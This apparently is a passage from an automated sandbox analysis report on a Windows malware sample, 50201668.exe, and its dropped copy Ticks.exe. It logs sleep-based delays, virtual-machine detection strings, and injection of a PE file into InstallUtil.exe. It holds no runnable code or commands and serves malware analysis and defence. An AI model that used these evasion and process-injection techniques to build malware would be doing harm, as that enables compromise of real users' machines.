Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98467s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -98008s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97592s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97320s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -96093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -94890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -94781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -94610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -94500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe TID: 7864	Thread sleep time: -94387s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8064	Thread sleep count: 657 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8064	Thread sleep count: 2730 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -98216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99889	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99563	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 99084	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98944	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98828	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98679	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98545	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98436	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98322	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98215	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 98104	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97788	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97569	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97429	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97273	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97156	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 97044	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96934	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96813	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96700	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96469	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96344	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96234	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96125	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 96015	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95906	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95797	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95688	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95563	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95344	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95219	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95109	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 95000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94877	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94750	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94593	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94470	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94353	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94212	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Thread delayed: delay time: 94078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99637	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99385	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99123	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98363	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98467	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 98008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97592	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97320	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 96093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95327	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 95000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 94890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 94781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 94610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 94500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Thread delayed: delay time: 94387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Ticks.exe, 0000000C.00000002.1689127101.00000000015DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: wscript.exe, 0000000B.00000002.1505561685.0000023010D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: InstallUtil.exe, 0000000D.00000002.2518049299.0000000001462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: 50201668.exe, 00000006.00000002.1411458056.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000009.00000002.2519386578.0000000001654000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllultu

Source: C:\Users\user\Desktop\50201668.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1043008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10C6008	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Ticks.exe "C:\Users\user\AppData\Roaming\Ticks.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Queries volume information: C:\Users\user\Desktop\50201668.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\50201668.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ticks.exe VolumeInformation	Jump to behavior
